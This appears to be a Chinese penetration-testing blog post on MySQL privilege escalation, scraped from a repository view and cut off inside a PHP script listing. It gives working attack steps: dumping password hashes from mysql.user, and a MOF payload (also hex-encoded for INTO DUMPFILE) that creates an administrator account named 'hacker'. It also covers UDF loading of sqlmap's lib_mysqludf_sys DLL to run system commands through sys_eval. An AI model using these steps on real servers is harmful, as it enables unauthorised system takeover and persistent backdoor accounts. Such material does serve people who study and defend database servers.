-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbb41611ac1d5.html
260 lines (224 loc) · 123 KB
/
bb41611ac1d5.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>MySQL提权 | BaiKer</title><meta name="keywords" content="内网渗透,提权"><meta name="author" content="BaiKer"><meta name="copyright" content="BaiKer"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="MySQL提权必要条件: 具有MySQL的root权限 具有执行SQL语句的权限 查询MySQL账号密码123456# MySQL <= 5.6 版本mysql> select host, user, password from mysql.user;# MySQL >= 5.7 版本mysql > select host,user,authentication_str">
<meta property="og:type" content="article">
<meta property="og:title" content="MySQL提权">
<meta property="og:url" content="http://baiker.top/bb41611ac1d5.html">
<meta property="og:site_name" content="BaiKer">
<meta property="og:description" content="MySQL提权必要条件: 具有MySQL的root权限 具有执行SQL语句的权限 查询MySQL账号密码123456# MySQL <= 5.6 版本mysql> select host, user, password from mysql.user;# MySQL >= 5.7 版本mysql > select host,user,authentication_str">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://baiker.top/img/wallhaven-gj977q.png">
<meta property="article:published_time" content="2021-09-12T06:30:21.000Z">
<meta property="article:modified_time" content="2021-11-02T01:48:18.776Z">
<meta property="article:author" content="BaiKer">
<meta property="article:tag" content="内网渗透">
<meta property="article:tag" content="提权">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://baiker.top/img/wallhaven-gj977q.png"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://baiker.top/bb41611ac1d5"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
root: '/',
algolia: undefined,
localSearch: undefined,
translate: undefined,
noticeOutdate: undefined,
highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
copy: {
success: '复制成功',
error: '复制错误',
noSupport: '浏览器不支持'
},
relativeDate: {
homepage: false,
post: false
},
runtime: '天',
date_suffix: {
just: '刚刚',
min: '分钟前',
hour: '小时前',
day: '天前',
month: '个月前'
},
copyright: undefined,
lightbox: 'fancybox',
Snackbar: undefined,
source: {
justifiedGallery: {
js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.js',
css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.css'
}
},
isPhotoFigcaption: false,
islazyload: false,
isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
title: 'MySQL提权',
isPost: true,
isHome: false,
isHighlightShrink: false,
isToc: true,
postUpdate: '2021-11-02 09:48:18'
}</script><noscript><style type="text/css">
#nav {
opacity: 1
}
.justified-gallery img {
opacity: 1
}
#recent-posts time,
#post-meta time {
display: inline !important
}
</style></noscript><script>(win=>{
win.saveToLocal = {
set: function setWithExpiry(key, value, ttl) {
if (ttl === 0) return
const now = new Date()
const expiryDay = ttl * 86400000
const item = {
value: value,
expiry: now.getTime() + expiryDay,
}
localStorage.setItem(key, JSON.stringify(item))
},
get: function getWithExpiry(key) {
const itemStr = localStorage.getItem(key)
if (!itemStr) {
return undefined
}
const item = JSON.parse(itemStr)
const now = new Date()
if (now.getTime() > item.expiry) {
localStorage.removeItem(key)
return undefined
}
return item.value
}
}
win.getScript = url => new Promise((resolve, reject) => {
const script = document.createElement('script')
script.src = url
script.async = true
script.onerror = reject
script.onload = script.onreadystatechange = function() {
const loadState = this.readyState
if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
script.onload = script.onreadystatechange = null
resolve()
}
document.head.appendChild(script)
})
win.activateDarkMode = function () {
document.documentElement.setAttribute('data-theme', 'dark')
if (document.querySelector('meta[name="theme-color"]') !== null) {
document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
}
}
win.activateLightMode = function () {
document.documentElement.setAttribute('data-theme', 'light')
if (document.querySelector('meta[name="theme-color"]') !== null) {
document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
}
}
const t = saveToLocal.get('theme')
if (t === 'dark') activateDarkMode()
else if (t === 'light') activateLightMode()
const asideStatus = saveToLocal.get('aside-status')
if (asideStatus !== undefined) {
if (asideStatus === 'hide') {
document.documentElement.classList.add('hide-aside')
} else {
document.documentElement.classList.remove('hide-aside')
}
}
const detectApple = () => {
if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
document.documentElement.classList.add('apple')
}
}
detectApple()
})(window)</script><meta name="referrer" content="no-referrer" /><link rel="stylesheet" href="https://baiker.top/css/essay.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Zfour/Butterfly-double-row-display@1.00/cardlistpost.css"/><meta name="generator" content="Hexo 5.4.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><div class="data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">40</div></a></div><div class="data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">22</div></a></div><div class="data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">45</div></a></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://baiker.top/img/wallhaven-gj977q.png')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">BaiKer</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">MySQL提权</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2021-09-12T06:30:21.000Z" title="发表于 2021-09-12 14:30:21">2021-09-12</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2021-11-02T01:48:18.776Z" title="更新于 2021-11-02 09:48:18">2021-11-02</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">漏洞利用</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/">服务器应用漏洞</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Mysql%E6%95%B0%E6%8D%AE%E5%BA%93/">Mysql数据库</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E6%8F%90%E6%9D%83/">提权</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E6%8F%90%E6%9D%83/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83/">数据库提权</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">3.9k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>21分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="MySQL提权"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h2 id="MySQL提权"><a href="#MySQL提权" class="headerlink" title="MySQL提权"></a>MySQL提权</h2><p><strong>必要条件:</strong></p>
<ul>
<li>具有MySQL的root权限</li>
<li>具有执行SQL语句的权限</li>
</ul>
<h2 id="查询MySQL账号密码"><a href="#查询MySQL账号密码" class="headerlink" title="查询MySQL账号密码"></a>查询MySQL账号密码</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># MySQL <= 5.6 版本</span><br><span class="line">mysql> select host, user, password from mysql.user;</span><br><span class="line"></span><br><span class="line"># MySQL >= 5.7 版本</span><br><span class="line">mysql > select host,user,authentication_string from mysql.user;</span><br><span class="line"># 查询到的值是Hash加密的</span><br></pre></td></tr></table></figure>
<h2 id="MOF提权"><a href="#MOF提权" class="headerlink" title="MOF提权"></a>MOF提权</h2><p>利用了<code>C:\Windows\System32\wbem\MOF</code>目录下的<code>nullevt.mot</code>文件</p>
<p>利用该文件每分钟会去执行一次的特性,向该文件中写入cmd命令,就会被执行</p>
<p>这个 MOF 里面有一部分是 VBS 脚本,所以可以利用这个 VBS 脚本来调用 CMD 来执行系统命令,如果 MySQL 有权限操作 mof 目录的话,就可以来执行任意命令了</p>
<p><strong>利用条件:</strong></p>
<ul>
<li>只适用于低版本的Windows系统</li>
<li>对<code>C:\Windows\System32\wbem\MOF</code>目录有读写权限</li>
</ul>
<p>上传MOF文件内容</p>
<figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">#pragma name<span class="built_in">space</span>(<span class="string">"\\\\.\\root\\subscription"</span>) </span><br><span class="line"></span><br><span class="line">instance of __EventFilter as $EventFilter </span><br><span class="line">{ </span><br><span class="line"> EventNamespace = <span class="string">"Root\\Cimv2"</span>; </span><br><span class="line"> Name = <span class="string">"filtP2"</span>; </span><br><span class="line"> Query = <span class="string">"Select * From __InstanceModificationEvent "</span> </span><br><span class="line"> <span class="string">"Where TargetInstance Isa \"</span>Win32_LocalTime\<span class="string">" "</span> </span><br><span class="line"> <span class="string">"And TargetInstance.Second = 5"</span>; </span><br><span class="line"> QueryLanguage = <span class="string">"WQL"</span>; </span><br><span class="line">}; </span><br><span class="line"></span><br><span class="line">instance of ActiveScriptEventConsumer as $Consumer </span><br><span class="line">{ </span><br><span class="line"> Name = <span class="string">"consPCSV2"</span>; </span><br><span class="line"> ScriptingEngine = <span class="string">"JScript"</span>; </span><br><span class="line"> ScriptText = </span><br><span class="line"><span class="string">"var WSH = new ActiveXObject(\"</span>WScript.Shell\<span class="string">")\nWSH.run(\"</span>net.exe user hacker P@ssw0rd /add\<span class="string">")\nWSH.run(\"</span>net.exe localgroup administrators hacker /add\<span class="string">")"</span>; </span><br><span class="line">}; </span><br><span class="line"></span><br><span class="line">instance of __FilterToConsumerBinding </span><br><span class="line">{ </span><br><span class="line"> Consumer = $Consumer; </span><br><span class="line"> Filter = $EventFilter; </span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>MySQL 写文件的特性将这个 MOF 文件导入到 <code>C:/Windows/system32/wbem/mof/</code> 目录下,讲上面的代码转换为16进制,在开头添加0x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select 0x23707261676D61206E616D65737061636528225C5C5C5C2E5C5C726F6F745C5C737562736372697074696F6E2229200A0A696E7374616E6365206F66205F5F4576656E7446696C74657220617320244576656E7446696C746572200A7B200A202020204576656E744E616D657370616365203D2022526F6F745C5C43696D7632223B200A202020204E616D6520203D202266696C745032223B200A202020205175657279203D202253656C656374202A2046726F6D205F5F496E7374616E63654D6F64696669636174696F6E4576656E742022200A20202020202020202020202022576865726520546172676574496E7374616E636520497361205C2257696E33325F4C6F63616C54696D655C222022200A20202020202020202020202022416E6420546172676574496E7374616E63652E5365636F6E64203D2035223B200A2020202051756572794C616E6775616765203D202257514C223B200A7D3B200A0A696E7374616E6365206F66204163746976655363726970744576656E74436F6E73756D65722061732024436F6E73756D6572200A7B200A202020204E616D65203D2022636F6E735043535632223B200A20202020536372697074696E67456E67696E65203D20224A536372697074223B200A2020202053637269707454657874203D200A2276617220575348203D206E657720416374697665584F626A656374285C22575363726970742E5368656C6C5C22295C6E5753482E72756E285C226E65742E6578652075736572206861636B6572205040737377307264202F6164645C22295C6E5753482E72756E285C226E65742E657865206C6F63616C67726F75702061646D696E6973747261746F7273206861636B6572202F6164645C2229223B200A7D3B200A0A696E7374616E6365206F66205F5F46696C746572546F436F6E73756D657242696E64696E67200A7B200A20202020436F6E73756D65722020203D2024436F6E73756D65723B200A2020202046696C746572203D20244576656E7446696C7465723B200A7D3B0A </span><br><span class="line">into dumpfile "C:/windows/system32/wbem/mof/test.mof";</span><br></pre></td></tr></table></figure>
<p>执行成功的的时候,test.mof 会出现在:<code>c:/windows/system32/wbem/goog/</code> 目录下 否则出现在 <code>c:/windows/system32/wbem/bad</code> 目录下</p>
<p>然后会建立hacker用户</p>
<p><strong>修复措施</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 停止 winmgmt 服务</span></span><br><span class="line">net stop winmgmt</span><br><span class="line"></span><br><span class="line"><span class="comment"># 删除 Repository 文件夹</span></span><br><span class="line">rmdir /s /q C:\Windows\system32\wbem\Repository\</span><br><span class="line"></span><br><span class="line"><span class="comment"># 手动删除 mof 文件</span></span><br><span class="line">del C:\Windows\system32\wbem\mof\good\test.mof /F /S</span><br><span class="line"></span><br><span class="line"><span class="comment"># 删除创建的用户</span></span><br><span class="line">net user hacker /delete</span><br><span class="line"></span><br><span class="line"><span class="comment"># 重新启动服务</span></span><br><span class="line">net start winmgmt</span><br></pre></td></tr></table></figure>
<h2 id="UDF提权"><a href="#UDF提权" class="headerlink" title="UDF提权"></a>UDF提权</h2><p>自定义函数,是数据库功能的一种扩展。用户通自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像调用本机函数 version() 等方便。</p>
<p><strong>利用条件:</strong></p>
<p>如果是 MySQL >= 5.1 的版本,必须把 UDF 的动态链接库文件<code>udf.dll</code>放置在mysql安装目录的<code>MySQL\Lib\Plugin\</code>文件夹下,该目录默认是不存在的,需要使用webshell找到mysql的安装目录,并在安装目录下创建<code>MySQL\Lib\Plugin\</code>文件夹,然后将udf.dll导入到该目录。</p>
<p>如果是 MySQL <= 5.1 的版本,udf.dll文件在windows server 2003下放置于<code>c:/windows/system32/</code>目录,在windows server 2000下放置在<code>c:/winnt/system32/</code>目录。</p>
<p>掌握mysql数据库的root账户,从而拥有对mysql的insert和delete权限,以创建和抛弃函数。</p>
<p>拥有可以将udf.dll写入相应目录的权限</p>
<p><strong>sqlmap 的 UDF 动态链接库文件位置</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap/data/udf/mysql</span><br></pre></td></tr></table></figure>
<p><strong>这个dll文件是经过编码的,需要解码,sqlmap解码文件位置</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap/extra/clock/cloak.py</span><br></pre></td></tr></table></figure>
<p><strong>解码方法如下</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 解码 32 位的 Linux 动态链接库</span></span><br><span class="line">cloak.py -d -i ../../data/udf/mysql/windows/<span class="number">32</span>/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_32.so</span><br><span class="line"></span><br><span class="line"><span class="comment"># 解码 64 位的 Linux 动态链接库</span></span><br><span class="line">cloak.py -d -i ../../data/udf/mysql/windows/<span class="number">64</span>/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so</span><br><span class="line"></span><br><span class="line"><span class="comment"># 解码 32 位的 Windows 动态链接库</span></span><br><span class="line">cloak.py -d -i ../../data/udf/mysql/windows/<span class="number">32</span>/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll</span><br><span class="line"></span><br><span class="line"><span class="comment"># 解码 64 位的 Windows 动态链接库</span></span><br><span class="line">cloak.py -d -i ../../data/udf/mysql/windows/<span class="number">64</span>/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll</span><br></pre></td></tr></table></figure>
<p><strong>查看MySQL的插件目录</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show variables like '%plugin%';</span><br></pre></td></tr></table></figure>
<p>如果没有该目录可以手动创建</p>
<p>需要有写入权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># 查看MySQL安装目录</span><br><span class="line">select @@basedir;</span><br><span class="line"></span><br><span class="line"># 创建/lib/plugin/文件夹</span><br><span class="line">select 1 into dumpfile 'C:\\PhpStudy\\PHPTutorial\\MySQL\\lib\\plugin::$index_allocation';</span><br></pre></td></tr></table></figure>
<p><strong>把动态链接库写入MySQL</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">select load_file('sqlmap/extra/cloak/lib_mysqludf_sys_64.dll') </span><br><span class="line">into outfile 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll'</span><br><span class="line"></span><br><span class="line">select load_file('sqlmap/extra/cloak/lib_mysqludf_sys_64.dll') </span><br><span class="line">into dumpfile 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll'</span><br><span class="line"></span><br><span class="line"># 也可以进行编码</span><br><span class="line">select hex(load_file('sqlmap/extra/cloak/lib_mysqludf_sys_64.dll')) </span><br><span class="line">into outfile 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll'</span><br><span class="line"></span><br><span class="line">sqlmap.py -u http://127.0.0.1/?id=1 --file-write lib_mysqludf_sys_64.dll </span><br><span class="line">--file-dest 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll'</span><br></pre></td></tr></table></figure>
<p><strong>创建自定义函数并调用命令</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys_64.dll';</span><br></pre></td></tr></table></figure>
<p>查看自定义函数是否创建成功</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from mysql.func;</span><br></pre></td></tr></table></figure>
<p>执行命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select sys_eval('ipconfig');</span><br></pre></td></tr></table></figure>
<p><strong>删除自定义函数</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">drop function sys_eval;</span><br></pre></td></tr></table></figure>
<p><strong>无法直连时通过Navicat上传PHP脚本</strong></p>
<p>脚本代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span 